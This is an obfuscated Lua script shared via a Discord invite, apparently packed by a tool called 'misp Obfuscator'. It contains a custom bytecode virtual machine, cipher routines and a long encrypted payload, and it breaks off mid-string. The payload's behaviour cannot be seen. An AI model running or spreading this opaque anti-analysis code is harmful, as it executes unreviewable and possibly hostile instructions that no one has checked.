--[[
    ███████╗██╗   ░█████╗░██████╗░███████╗██╗░░░██╗░██████╗░█████╗░░█████╗░████████╗░█████╗░██████╗░
    ╚════██║██║   ██╔══██╗██╔══██╗██╔════╝██║░░░██║██╔════╝██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗
    ░░███╔═╝██║   ██║░░██║██████╦╝█████╗░░██║░░░██║╚█████╗░██║░░╚═╝███████║░░░██║░░░██║░░██║██████╔╝
    ██╔══╝░░██║   ██║░░██║██╔══██╗██╔══╝░░██║░░░██║░╚═══██╗██║░░██╗██╔══██║░░░██║░░░██║░░██║██╔══██╗
    ███████╗██║   ╚█████╔╝██████╦╝██║░░░░░╚██████╔╝██████╔╝╚█████╔╝██║░░██║░░░██║░░░╚█████╔╝██║░░██║
    ╚══════╝╚═╝   ░╚════╝░╚═════╝░╚═╝░░░░░░╚═════╝░╚═════╝░░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝
                                      /discord.gg/dkZSwVx9\
]]



local a="misp Obfuscator - 0.0.3"return(function()local a="\98\108\117\100\32\105\115\32\116\114\121\105\110\103\32\116\111\32\100\101\111\98\102"local a="\98\108\117\100\32\105\115\32\116\114\121\105\110\103\32\116\111\32\100\101\111\98\102"local a="\98\108\117\100\32\105\115\32\116\114\121\105\110\103\32\116\111\32\100\101\111\98\102"local a=47;local a=298;local a=3;local a=function(a)local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'a=string.gsub(a,'[^'..b..'=]','')return a:gsub('.',function(a)if a=='='then return''end;local a,b='',b:find(a)-1;for c=6,1,-1 do a=a..(b%2^c-b%2^(c-1)>0 and'1'or'0')end;return a end):gsub('%d%d%d?%d?%d?%d?%d?%d?',function(a)if#a~=8 then return''end;local b=0;for c=1,8 do b=b+(a:sub(c,c)=='1'and 2^(8-c)or 0)end;return string.char(b)end)end;local b=45;local b=(function()local function a(a)local b={}for a=0,255 do b[a]={}end;b[0][0]=a[1]*255;local c=1;for d=0,7 do for d=0,c-1 do for e=0,c-1 do local f=b[d][e]-a[1]*c;b[d][e+c]=f+a[2]*c;b[d+c][e]=f+a[3]*c;b[d+c][e+c]=f+a[4]*c end end;c=c*2 end;return b end;local a=a{0,1,1,0}local function b(a,b)local c,d,e=a.S,a.i,a.j;local f={}local g=string.char;for a=1,b do d=(d+1)%256;e=(e+c[d])%256;c[d],c[e]=c[e],c[d]f[a]=g(c[(c[d]+c[e])%256])end;a.i,a.j=d,e;return table.concat(f)end;local function c(c,d)local b=b(c,#d)local c={}local e=string.byte;local f=string.char;for g=1,#d do c[g]=f(a[e(d,g)][e(b,g)])end;return table.concat(c)end;local function a(a,b)local a=a.S;local c,d=0,#b;local e=string.byte;for f=0,255 do c=(c+a[f]+e(b,f%d+1))%256;a[f],a[c]=a[c],a[f]end end;function new(d)local e={}local a={S=e,i=0,j=0,generate=b,cipher=c,schedule=a}for a=0,255 do e[a]=a end;if d then a:schedule(d)end;return a end;return new end)()local c=getfenv or function()return _ENV end;local c=(function()if not bit then local a=nil;pcall(function()a=require('bit')end)bit=a end;local a=bit or bit32 or(function()local a={_TYPE='module',_NAME='bit.numberlua',_VERSION='0.3.1.20120131'}local b=math.floor;local c=2^32;local d=c-1;local function e(a)local b={}local c=setmetatable({},b)function b:__index(b)local a=a(b)c[b]=a;return a end;return c end;local function f(a,b)local function c(c,d)local e,f=0,1;while c~=0 and d~=0 do local g,h=c%b,d%b;e=e+a[g][h]*f;c=(c-g)/b;d=(d-h)/b;f=f*b end;e=e+(c+d)*f;return e end;return c end;local function g(a)local b=f(a,2^1)local b=e(function(a)return e(function(c)return b(a,c)end)end)return f(b,2^(a.n or 1))end;function a.tobit(a)return a%2^32 end;a.bxor=g{[0]={[0]=0,[1]=1},[1]={[0]=1,[1]=0},n=4}local e=a.bxor;function a.bnot(a)return d-a end;local f=a.bnot;function a.band(a,b)return(a+b-e(a,b))/2 end;local g=a.band;function a.bor(a,b)return d-g(d-a,d-b)end;local h=a.bor;local i,j;function a.rshift(a,c)if c<0 then return i(a,-c)end;return b(a%2^32/2^c)end;j=a.rshift;function a.lshift(a,b)if b<0 then return j(a,-b)end;return a*2^b%2^32 end;i=a.lshift;function a.tohex(a,b)b=b or 8;local c;if b<=0 then if b==0 then return''end;c=true;b=-b end;a=g(a,16^b-1)return('%0'..b..(c and'X'or'x')):format(a)end;local b=a.tohex;function a.extract(a,b,c)c=c or 1;return g(j(a,b),2^c-1)end;local k=a.extract;function a.replace(a,b,c,d)d=d or 1;local d=2^d-1;b=g(b,d)local d=f(i(d,c))return g(a,d)+i(b,c)end;local l=a.replace;function a.bswap(a)local b=g(a,255)a=j(a,8)local c=g(a,255)a=j(a,8)local d=g(a,255)a=j(a,8)local a=g(a,255)return i(i(i(b,8)+c,8)+d,8)+a end;local m=a.bswap;function a.rrotate(a,b)b=b%32;local c=g(a,2^b-1)return j(a,b)+i(c,32-b)end;local n=a.rrotate;function a.lrotate(a,b)return n(a,-b)end;local o=a.lrotate;a.rol=a.lrotate;a.ror=a.rrotate;function a.arshift(a,b)local c=j(a,b)if a>=2147483648 then c=c+i(2^b-1,32-b)end;return c end;local p=a.arshift;function a.btest(a,b)return g(a,b)~=0 end;a.bit32={}local function q(a)return(-1-a)%c end;a.bit32.bnot=q;local function q(a,b,d,...)local f;if b then a=a%c;b=b%c;f=e(a,b)if d then f=q(f,d,...)end;return f elseif a then return a%c else return 0 end end;a.bit32.bxor=q;local function q(a,b,f,...)local g;if b then a=a%c;b=b%c;g=(a+b-e(a,b))/2;if f then g=q(g,f,...)end;return g elseif a then return a%c else return d end end;a.bit32.band=q;local function r(a,b,e,...)local f;if b then a=a%c;b=b%c;f=d-g(d-a,d-b)if e then f=r(f,e,...)end;return f elseif a then return a%c else return 0 end end;a.bit32.bor=r;function a.bit32.btest(...)return q(...)~=0 end;function a.bit32.lrotate(a,b)return o(a%c,b)end;function a.bit32.rrotate(a,b)return n(a%c,b)end;function a.bit32.lshift(a,b)if b>31 or b<-31 then return 0 end;return i(a%c,b)end;function a.bit32.rshift(a,b)if b>31 or b<-31 then return 0 end;return j(a%c,b)end;function a.bit32.arshift(a,b)a=a%c;if b>=0 then if b>31 then return a>=2147483648 and d or 0 else local c=j(a,b)if a>=2147483648 then c=c+i(2^b-1,32-b)end;return c end else return i(a,-b)end end;function a.bit32.extract(a,b,...)local d=...or 1;if b<0 or b>31 or d<0 or b+d>32 then error'out of range'end;a=a%c;return k(a,b,...)end;function a.bit32.replace(a,b,d,...)local e=...or 1;if d<0 or d>31 or e<0 or d+e>32 then error'out of range'end;a=a%c;b=b%c;return l(a,b,d,...)end;a.bit={}function a.bit.tobit(a)a=a%c;if a>=2147483648 then a=a-c end;return a end;local d=a.bit.tobit;function a.bit.tohex(a,...)return b(a%c,...)end;function a.bit.bnot(a)return d(f(a%c))end;local function b(a,e,f,...)if f then return b(b(a,e),f,...)elseif e then return d(h(a%c,e%c))else return d(a)end end;a.bit.bor=b;local function b(a,e,f,...)if f then return b(b(a,e),f,...)elseif e then return d(g(a%c,e%c))else return d(a)end end;a.bit.band=b;local function b(a,f,g,...)if g then return b(b(a,f),g,...)elseif f then return d(e(a%c,f%c))else return d(a)end end;a.bit.bxor=b;function a.bit.lshift(a,b)return d(i(a%c,b%32))end;function a.bit.rshift(a,b)return d(j(a%c,b%32))end;function a.bit.arshift(a,b)return d(p(a%c,b%32))end;function a.bit.rol(a,b)return d(o(a%c,b%32))end;function a.bit.ror(a,b)return d(n(a%c,b%32))end;function a.bit.bswap(a)return d(m(a%c))end;return a end)()local b=table.unpack or unpack;local d;local e;local f;local g=50;local h={[22]=18,[31]=8,[33]=28,[0]=3,[1]=13,[2]=23,[26]=33,[12]=1,[13]=6,[14]=10,[15]=16,[16]=20,[17]=26,[18]=30,[19]=36,[3]=0,[4]=2,[5]=4,[6]=7,[7]=9,[8]=12,[9]=14,[10]=17,[20]=19,[21]=22,[23]=24,[24]=27,[25]=29,[27]=32,[32]=34,[34]=37,[11]=5,[28]=11,[29]=15,[30]=21,[35]=25,[36]=31,[37]=35}local i={[0]='ABC','ABx','ABC','ABC','ABC','ABx','ABC','ABx','ABC','ABC','ABC','ABC','ABC','ABC','ABC','ABC','ABC','ABC','ABC','ABC','ABC','ABC','AsBx','ABC','ABC','ABC','ABC','ABC','ABC','ABC','ABC','AsBx','AsBx','ABC','ABC','ABC','ABx','ABC'}local j={[0]={b='OpArgR',c='OpArgN'},{b='OpArgK',c='OpArgN'},{b='OpArgU',c='OpArgU'},{b='OpArgR',c='OpArgN'},{b='OpArgU',c='OpArgN'},{b='OpArgK',c='OpArgN'},{b='OpArgR',c='OpArgK'},{b='OpArgK',c='OpArgN'},{b='OpArgU',c='OpArgN'},{b='OpArgK',c='OpArgK'},{b='OpArgU',c='OpArgU'},{b='OpArgR',c='OpArgK'},{b='OpArgK',c='OpArgK'},{b='OpArgK',c='OpArgK'},{b='OpArgK',c='OpArgK'},{b='OpArgK',c='OpArgK'},{b='OpArgK',c='OpArgK'},{b='OpArgK',c='OpArgK'},{b='OpArgR',c='OpArgN'},{b='OpArgR',c='OpArgN'},{b='OpArgR',c='OpArgN'},{b='OpArgR',c='OpArgR'},{b='OpArgR',c='OpArgN'},{b='OpArgK',c='OpArgK'},{b='OpArgK',c='OpArgK'},{b='OpArgK',c='OpArgK'},{b='OpArgR',c='OpArgU'},{b='OpArgR',c='OpArgU'},{b='OpArgU',c='OpArgU'},{b='OpArgU',c='OpArgU'},{b='OpArgU',c='OpArgN'},{b='OpArgR',c='OpArgN'},{b='OpArgR',c='OpArgN'},{b='OpArgN',c='OpArgU'},{b='OpArgU',c='OpArgU'},{b='OpArgN',c='OpArgN'},{b='OpArgU',c='OpArgN'},{b='OpArgU',c='OpArgN'}}local function k(a,b,c,d)local e=0;for c=b,c,d do e=e+string.byte(a,c,c)*256^(c-b)end;return e end;local function l(b,c,d,e)local f=(-1)^a.rshift(e,7)local e=a.rshift(d,7)+a.lshift(a.band(e,127),1)local a=b+a.lshift(c,8)+a.lshift(a.band(d,127),16)local b=1;if e==0 then if a==0 then return f*0 else b=0;e=1 end elseif e==127 then if a==0 then return f*1/0 else return f*0/0 end end;return f*2^(e-127)*(1+b/2^23)end;local function m(b,c,d,e,f,g,h,i)local j=(-1)^a.rshift(i,7)local i=a.lshift(a.band(i,127),4)+a.rshift(h,4)local a=a.band(h,15)*2^48;local h=1;a=a+g*2^40+f*2^32+e*2^24+d*2^16+c*2^8+b;if i==0 then if a==0 then return j*0 else h=0;i=1 end elseif i==2047 then if a==0 then return j*1/0 else return j*0/0 end end;return j*2^(i-1023)*(h+a/2^52)end;local function n(a,b,c)return k(a,b,c-1,1)end;local function o(a,b,c)return k(a,c-1,b,-1)end;local function k(a,b)return l(string.byte(a,b,b+3))end;local function p(a,b)local a,b,c,d=string.byte(a,b,b+3)return l(d,c,b,a)end;local function l(a,b)return m(string.byte(a,b,b+7))end;local function q(a,b)local a,b,c,d,e,f,g,h=string.byte(a,b,b+7)return m(h,g,f,e,d,c,b,a)end;local k={[4]={little=k,big=p},[8]={little=l,big=q}}local function l(a)local b=a.index;local c=string.byte(a.source,b,b)a.index=b+1;return c end;local function m(a,b)local b=a.index+b;local c=string.sub(a.source,a.index,b-1)a.index=b;return c end;local function p(a)local b=a:s_szt()local c;if b~=0 then c=string.sub(m(a,b),1,-2)end;return c end;local function q(a,b)return function(c)local a=c.index+a;local b=b(c.source,c.index,a)c.index=a;return b end end;local function r(a,b)return function(c)local b=b(c.source,c.index)c.index=c.index+a;return b end end;local function s(b)local c=b:s_int()local d={}for c=1,c do local b=b:s_ins()local e=a.band(b,63)local f=i[e]local g=j[e]local e={value=b,op=h[e],A=a.band(a.rshift(b,6),255)}if f=='ABC'then e.B=a.band(a.rshift(b,23),511)e.C=a.band(a.rshift(b,14),511)e.is_KB=g.b=='OpArgK'and e.B>255;e.is_KC=g.c=='OpArgK'and e.C>255 elseif f=='ABx'then e.Bx=a.band(a.rshift(b,14),262143)e.is_K=g.b=='OpArgK'elseif f=='AsBx'then e.sBx=a.band(a.rshift(b,14),262143)-131071 end;d[c]=e end;return d end;local function a(a)local b=a:s_int()local c={}for b=1,b do local d=l(a)local e;if d==1 then e=l(a)~=0 elseif d==3 then e=a:s_num()elseif d==4 then e=p(a)end;c[b]=e end;return c end;local function i(a,b)local c=a:s_int()local d={}for c=1,c do d[c]=f(a,b)end;return d end;local function j(a)local b=a:s_int()local c={}for b=1,b do c[b]=a:s_int()end;return c end;local function t(a)local b=a:s_int()local c={}for b=1,b do c[b]={varname=p(a),startpc=a:s_int(),endpc=a:s_int()}end;return c end;local function u(a)local b=a:s_int()local c={}for b=1,b do c[b]=p(a)end;return c end;function f(b,c)local d={}local c=p(b)or c;d.source=c;b:s_int()b:s_int()d.numupvals=l(b)d.numparams=l(b)l(b)l(b)d.code=s(b)d.const=a(b)d.subs=i(b,c)d.lines=j(b)t(b)u(b)for a,a in ipairs(d.code)do if a.is_K then a.const=d.const[a.Bx+1]else if a.is_KB then a.const_B=d.const[a.B-255]end;if a.is_KC then a.const_C=d.const[a.C-255]end end end;return d end;function d(a)local b;local c;local d;local e;local g;local h;local i;local a={index=1,source=a}assert(m(a,4)=='\27Lua','invalid Lua signature')assert(l(a)==81,'invalid Lua version')assert(l(a)==0,'invalid Lua format')c=l(a)~=0;d=l(a)e=l(a)g=l(a)h=l(a)i=l(a)~=0;b=c and n or o;a.s_int=q(d,b)a.s_szt=q(e,b)a.s_ins=q(g,b)if i then a.s_num=q(h,b)elseif k[h]then a.s_num=r(h,k[h][c and'little'or'big'])else error('unsupported float size')end;return f(a,'@virtual')end;local function a(a,b)for c,d in pairs(a)do if d.index>=b then d.value=d.store[d.index]d.store=d;d.index='value'a[c]=nil end end end;local function f(a,b,c)local d=a[b]if not d then d={index=b,store=c}a[b]=d end;return d end;local function i(...)return select('#',...),{...}end;local function j(a,b)local c=a.source;local a=a.lines[a.pc-1]local d,e,f=string.match(b,'^(.-):(%d+):%s+(.+)')local g='%s:%i: [%s:%i] %s'a=a or'0'd=d or'?'e=e or'0'f=f or b;error(string.format(g,c,a,d,e,f),0)end;local function k(c)local d=c.code;local j=c.subs;local k=c.env;local l=c.upvals;local m=c.varargs;local n=-1;local o={}local p=c.stack;local q=c.pc;while true do local r=d[q]local s=r.op;q=q+1;if s<18 then if s<8 then if s<3 then if s<1 then for a=r.A,r.B do p[a]=nil end elseif s>1 then local a=l[r.B]p[r.A]=a.store[a.index]else local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;p[r.A]=a+b end elseif s>3 then if s<6 then if s>4 then local a=r.A;local b=r.B;local c;if r.is_KC then c=r.const_C else c=p[r.C]end;p[a+1]=p[b]p[a]=p[b][c]else p[r.A]=k[r.const]end elseif s>6 then local a;if r.is_KC then a=r.const_C else a=p[r.C]end;p[r.A]=p[r.B][a]else local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;p[r.A]=a-b end else p[r.A]=p[r.B]end elseif s>8 then if s<13 then if s<10 then k[r.const]=p[r.A]elseif s>10 then if s<12 then local a=r.A;local c=r.B;local d=r.C;local e;local f,g;if c==0 then e=n-a else e=c-1 end;f,g=i(p[a](b(p,a+1,a+e)))if d==0 then n=a+f-1 else f=d-1 end;for b=1,f do p[a+b-1]=g[b]end else local a=l[r.B]a.store[a.index]=p[r.A]end else local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;p[r.A]=a*b end elseif s>13 then if s<16 then if s>14 then local c=r.A;local d=r.B;local e;if d==0 then e=n-c else e=d-1 end;a(o,0)return i(p[c](b(p,c+1,c+e)))else local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;p[r.A][a]=b end elseif s>16 then p[r.A]={}else local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;p[r.A]=a/b end else p[r.A]=r.const end else local a=r.A;local b=p[a+2]local c=p[a]+b;local a=p[a+1]local d;if b==math.abs(b)then d=c<=a else d=c>=a end;if d then p[r.A]=c;p[r.A+3]=c;q=q+r.sBx end end elseif s>18 then if s<28 then if s<23 then if s<20 then p[r.A]=#p[r.B]elseif s>20 then if s<22 then local b=r.A;local c=r.B;local d={}local e;if c==0 then e=n-b+1 else e=c-1 end;for a=1,e do d[a]=p[b+a-1]end;a(o,0)return e,d else local a=p[r.B]for b=r.B+1,r.C do a=a..p[b]end;p[r.A]=a end else local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;p[r.A]=a%b end elseif s>23 then if s<26 then if s>24 then a(o,r.A)else local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;if a==b==(r.A~=0)then q=q+d[q].sBx end;q=q+1 end elseif s>26 then local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;if a<b==(r.A~=0)then q=q+d[q].sBx end;q=q+1 else local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;p[r.A]=a^b end else p[r.A]=r.B~=0;if r.C~=0 then q=q+1 end end elseif s>28 then if s<33 then if s<30 then local a,b;if r.is_KB then a=r.const_B else a=p[r.B]end;if r.is_KC then b=r.const_C else b=p[r.C]end;if a<=b==(r.A~=0)then q=q+d[q].sBx end;q=q+1 elseif s>30 then if s<32 then local a=j[r.Bx+1]local b=a.numupvals;local c;if b~=0 then c={}for a=1,b do local b=d[q+a-1]if b.op==h[0]then c[a-1]=f(o,b.B,p)elseif b.op==h[4]then c[a-1]=l[b.B]end end;q=q+b end;p[r.A]=e(a,k,c)else local a=r.A;local b=r.B;if not p[b]==(r.C~=0)then q=q+1 else p[a]=p[b]end end else p[r.A]=-p[r.B]end elseif s>33 then if s<36 then if s>34 then local a=r.A;local b=r.B;if b==0 then b=m.size;n=a+b-1 end;for b=1,b do p[a+b-1]=m.list[b]end else local a=r.A;local b,c,d;b=assert(tonumber(p[a]),'`for` initial value must be a number')c=assert(tonumber(p[a+1]),'`for` limit must be a number')d=assert(tonumber(p[a+2]),'`for` step must be a number')p[a]=b-d;p[a+1]=c;p[a+2]=d;q=q+r.sBx end elseif s>36 then local a=r.A;local b=r.C;local c=r.B;local d=p[a]local e;if c==0 then c=n-a end;if b==0 then b=r[q].value;q=q+1 end;e=(b-1)*g;for b=1,c do d[b+e]=p[a+b]end else p[r.A]=not p[r.B]end else if not p[r.A]==(r.C~=0)then q=q+1 end end else local a=r.A;local b=p[a]local c=p[a+1]local d=p[a+2]local e=a+3;local f;p[e+2]=d;p[e+1]=c;p[e]=b;f={b(c,d)}for a=1,r.C do p[e+a-1]=f[a]end;if p[e]~=nil then p[a+2]=p[e]else q=q+1 end end else q=q+r.sBx end;c.pc=q end end;function e(a,c,d)local e=a.code;local f=a.subs;local g=a.lines;local h=a.source;local a=a.numparams;local function l(...)local l={}local m={}local n=0;local i,o=i(...)local p;local q,r,s;for a=1,a do l[a-1]=o[a]end;if a<i then n=i-a;for b=1,n do m[b]=o[a+b]end end;p={varargs={list=m,size=n},code=e,subs=f,lines=g,source=h,env=c,upvals=d,stack=l,pc=1}q,r,s=pcall(k,p,...)if q then return b(s,1,r)else j(p,r)end;return end;return l end;return function(a,b)return e(d(a),b or c(0))end end)()local d='\101\108\73\57\77\88\78\110\76\49\115\108\85\81\61\61'local d="\109\89\71\113\67\83\80\55\78\81\105\87\89\66\90\56\116\72\65\56\89\102\100\51\74\71\113\79\85\51\57\111\82\70\49\103\43\88\88\54\103\107\54\49\65\80\97\83\110\77\73\115\103\107\97\80\117\107\81\49\88\86\105\77\48\105\109\120\65\87\98\48\112\105\66\68\68\112\74\67\73\84\89\83\49\55\121\98\70\90\74\111\66\102\110\47\68\105\87\82\82\67\120\53\74\84\100\54\69\74\75\85\107\80\109\53\68\82\104\89\116\120\120\65\65\85\114\97\117\101\119\69\106\112\118\78\103\103\67\108\77\43\69\48\83\74\122\78\122\103\100\78\111\83\56\83\76\82\112\102\88\57\108\67\104\120\104\117\110\86\65\77\121\121\65\52\87\77\121\87\85\43\88\116\119\120\107\50\119\114\43\79\52\47\66\74\115\51\66\99\73\71\80\74\113\52\67\76\68\51\120\81\111\76\111\109\114\76\118\70\57\113\70\106\100\110\71\89\66\72\74\84\85\88\118\80\65\89\102\97\88\86\73\57\120\72\114\89\43\43\120\54\122\50\69\99\85\79\86\84\68\57\80\111\71\106\69\78\88\67\72\84\43\103\105\70\56\76\88\102\119\83\112\89\115\75\84\117\112\101\109\81\51\70\90\107\83\65\68\100\108\75\54\51\80\113\118\117\49\71\106\99\119\49\111\116\89\107\76\120\54\73\74\114\121\122\118\101\85\70\66\107\67\65\81\97\79\81\52\87\53\49\73\109\122\68\52\100\81\81\75\111\71\116\99\68\105\50\101\112\81\69\71\67\69\52\113\79\103\107\84\122\79\73\72\87\101\104\49\55\98\109\106\52\120\55\78\113\52\52\86\84\78\78\122\108\80\83\84\90\119\121\78\66\69\81\107\65\73\112\89\88\72\109\50\103\106\103\120\65\100\99\104\115\100\72\114\110\116\85\104\72\84\99\97\107\54\106\68\83\105\81\86\102\111\76\65\68\71\76\119\113\81\66\70\87\90\109\77\88\50\118\89\54\52\67\122\68\72\54\101\118\56\110\104\89\105\50\101\101\122\104\114\86\114\116\106\72\103\74\66\87\111\103\73\83\79\112\87\50\107\83\116\78\52\98\90\86\98\66\106\115\43\69\100\57\66\86\74\48\85\78\71\69\47\97\114\99\117\120\114\73\122\66\84\116\120\70\69\85\53\120\70\47\107\122\82\67\121\56\76\89\121\109\82\114\102\109\71\106\100\98\102\56\100\122\56\78\99\101\112\89\119\122\109\57\79\101\70\77\77\54\106\99\99\101\89\54\82\79\54\108\79\113\114\116\43\71\108\50\113\82\79\71\111\53\55\109\81\98\117\110\53\109\70\112\116\53\98\77\68\111\97\111\50\49\77\86\67\114\78\118\106\107\113\47\82\90\73\105\104\72\107\110\107\65\69\50\82\69\99\108\117\82\105\90\105\74\51\71\77\100\109\118\74\118\116\109\116\115\121\90\89\53\110\50\84\87\81\86\84\89\112\108\121\107\120\77\82\54\73\66\87\110\121\110\98\89\70\115\49\51\98\88\110\108\80\83\115\83\47\89\51\72\76\66\66\73\57\118\69\120\71\54\88\86\116\120\71\114\112\83\111\106\102\48\111\49\51\54\111\49\105\118\99\74\71\69\70\53\110\115\79\121\113\83\74\80\105\111\66\103\78\119\84\105\121\43\51\122\75\70\85\80\84\70\85\121\47\81\89\48\103\101\87\65\70\114\116\69\53\70\52\56\107\118\68\109\65\120\76\51\47\76\115\56\73\108\52\103\104\101\66\109\53\78\100\105\84\77\81\86\78\68\67\77\87\67\80\120\69\117\109\102\86\116\116\69\77\48\53\49\75\55\103\82\69\67\103\56\103\87\75\49\50\105\99\100\107\99\80\101\84\106\100\53\79\119\80\82\100\77\108\68\97\73\83\119\70\106\88\52\72\88\88\57\99\72\116\54\81\48\69\76\67\67\86\43\83\48\88\115\66\50\105\110\107\116\53\56\113\78\107\117\50\87\104\67\73\43\57\49\71\55\106\67\77\98\90\110\113\69\97\98\113\74\71\121\99\108\73\102\99\113\84\99\118\115\99\116\113\116\105\52\56\101\114\100\83\87\77\110\107\105\70\75\69\115\108\83\109\48\119\53\68\47\119\48\85\73\82\87\66\71\70\50\122\68\72\100\98\48\66\51\119\84\85\99\66\107\52\113\117\54\47\43\80\52\53\107\52\86\80\108\119\43\119\43\87\97\55\114\68\49\113\49\80\47\113\78\81\106\122\111\90\66\74\51\115\70\119\54\114\84\99\110\100\101\53\105\86\56\50\108\113\66\47\66\81\84\48\111\89\71\50\84\50\112\97\75\57\86\43\67\69\53\114\98\86\108\90\101\117\73\105\79\119\55\120\70\71\88\88\117\54\105\112\86\104\56\84\89\118\110\66\54\114\72\52\82\81\105\73\68\114\114\65\119\48\69\105\50\56\103\100\53\122\80\76\117\78\114\120\55\97\75\69\49\67\74\87\111\79\82\112\112\119\104\82\100\121\65\114\73\88\67\68\70\81\78\79\54\73\68\82\47\110\68\84\70\65\114\90\106\116\51\112\76\119\80\114\89\43\117\106\100\51\87\52\119\87\109\55\54\74\50\82\88\56\105\109\89\83\109\105\113\103\113\104\110\56\79\82\113\56\99\118\115\83\51\49\77\118\48\99\112\73\116\103\81\107\70\104\56\75\69\56\75\80\52\101\101\57\120\99\86\68\79\108\121\48\108\106\84\106\100\109\49\116\73\56\116\119\75\66\67\55\43\102\104\68\112\116\121\47\70\79\67\81\71\90\106\50\72\66\73\48\102\85\84\115\117\80\102\43\117\54\109\47\49\56\53\66\88\55\113\104\116\122\115\89\76\110\109\79\80\71\104\47\109\85\55\116\79\47\97\73\109\90\118\65\50\120\97\67\102\85\81\71\98\84\53\116\99\65\80\66\47\47\53\75\97\99\115\110\113\87\98\72\103\117\52\101\120\49\109\112\110\78\77\75\103\110\69\105\100\82\76\65\113\65\81\121\84\122\119\88\68\57\97\114\106\81\75\66\57\72\107\89\85\86\121\76\69\72\85\69\43\90\57\97\71\106\81\89\103\73\115\79\73\112\105\98\84\114\103\89\48\43\77\88\73\105\107\87\121\119\51\118\87\78\53\81\68\53\121\110\67\54\78\99\120\51\70\90\100\52\75\51\82\57\71\115\56\108\110\51\80\120\49\100\102\108\116\68\115\110\111\52\51\110\116\88\68\78\77\81\49\116\80\80\118\88\101\57\68\72\103\114\82\115\82\49\110\67\117\104\102\109\75\68\56\111\47\51\47\43\49\109\121\53\50\110\53\114\70\113\111\54\81\116\121\109\116\117\115\53\88\50\82\49\104\84\67\52\86\90\65\109\87\48\78\112\103\111\87\80\78\121\82\57\82\90\105\47\49\109\103\121\99\67\88\49\109\80\75\100\84\105\100\69\113\47\52\87\110\68\113\74\67\47\69\122\115\115\112\80\43\84\84\53\121\99\52\110\77\81\100\107\57\97\88\97\122\43\78\81\90\100\77\54\57\71\98\76\70\50\116\54\79\89\116\111\105\66\119\117\43\51\109\106\57\87\110\117\43\79\82\102\57\102\118\71\73\43\106\54\85\81\122\88\80\83\83\98\67\69\79\120\112\89\113\73\76\50\114\116\118\88\56\104\75\86\57\76\52\73\116\47\80\97\86\88\85\70\118\57\117\121\73\80\67\82\100\84\57\74\121\114\80\50\76\100\116\103\107\102\114\50\116\70\119\114\81\66\76\77\52\90\74\88\65\43\82\79\67\105\122\78\57\56\80\106\118\81\51\102\86\110\85\75\53\69\77\68\104\85\107\108\69\115\114\68\65\67\82\101\76\118\52\55\121\57\69\73\74\121\89\68\50\90\68\55\115\113\108\49\122\51\116\111\119\110\85\117\109\50\75\74\71\52\116\53\120\113\51\82\56\69\53\74\68\98\122\53\117\43\105\85\57\116\110\79\113\112\101\115\68\117\89\99\99\80\116\68\71\89\88\68\122\69\120\77\76\111\73\99\101\83\109\56\71\79\72\76\43\88\85\118\84\118\76\86\76\68\101\110\112\115\102\117\56\53\53\100\120\107\50\53\86\114\121\104\68\52\52\54\74\112\88\78\105\107\50\72\111\107\50\86\53\87\68\66\52\54\56\81\107\51\73\75\88\80\65\70\50\107\83\86\76\56\86\66\57\87\65\43\73\74\88\108\105\107\85\80\110\109\117\100\114\69\77\65\115\99\55\65\88\71\74\112\53\81\76\110\75\113\99\114\89\68\119\89\43\118\50\120\66\68\83\108\89\76\52\83\51\81\67\69\55\75\120\55\49\111\57\85\52\50\120\82\55\116\48\80\52\79\71\121\108\54\115\107\79\102\103\84\52\48\114\119\73\103\50\87\98\72\101\101\66\109\80\71\85\54\71\88\78\82\68\109\98\102\85\83\102\70\72\109\113\76\99\53\90\86\55\118\121\74\120\56\65\50\113\122\110\105\67\114\79\109\78\69\89\76\121\76\86\47\72\69\69\121\118\49\98\108\68\66\81\118\121\82\109\118\53\111\101\111\84\78\75\52\43\86\101\48\74\49\100\105\67\76\72\110\75\49\49\100\115\90\115\110\52\106\48\119\50\111\116\73\108\49\55\119\119\116\67\47\50\76\97\55\107\117\97\53\119\97\73\111\113\55\83\78\55\115\86\99\77\73\120\120\104\119\90\85\90\118\78\108\116\83\54\68\47\71\78\48\104\47\120\81\84\114\106\102\80\101\114\115\109\103\110\53\119\48\116\80\71\116\66\72\119\90\55\87\87\119\52\107\72\111\82\117\65\84\67\48\116\77\122\112\111\69\67\98\70\67\71\70\86\66\112\108\88\97\111\72\77\53\48\65\115\57\100\80\88\99\56\65\83\53\102\115\100\56\43\104\121\87\51\57\88\104\89\67\100\80\122\102\99\67\53\97\119\102\53\43\102\82\117\111\52\108\97\108\86\100\102\97\121\85\114\74\120\51\87\89\114\99\78\109\86\118\65\57\83\68\100\50\112\111\75\53\105\47\118\122\54\73\109\109\57\83\73\57\100\79\48\50\99\77\47\81\122\74\86\74\43\53\54\78\67\98\49\47\107\85\53\68\122\106\76\87\50\106\82\97\119\50\90\97\50\119\100\48\78\109\102\67\65\117\118\101\81\85\73\79\85\81\66\74\85\99\109\88\68\53\106\120\79\69\108\100\77\75\121\70\55\78\117\101\107\70\71\78\104\109\113\113\52\121\78\116\70\51\84\110\116\48\99\86\90\49\119\119\66\47\79\121\80\107\97\86\108\111\80\81\100\88\116\99\90\111\55\105\100\109\108\103\116\117\54\114\65\114\85\121\52\119\77\89\97\85\51\68\67\83\47\104\72\111\118\57\108\53\56\97\56\115\79\83\111\82\79\98\49\69\110\79\79\113\82\53\103\109\79\101\111\120\101\119\98\100\68\51\85\102\66\108\50\75\74\47\84\86\75\85\71\103\49\121\49\99\71\53\90\8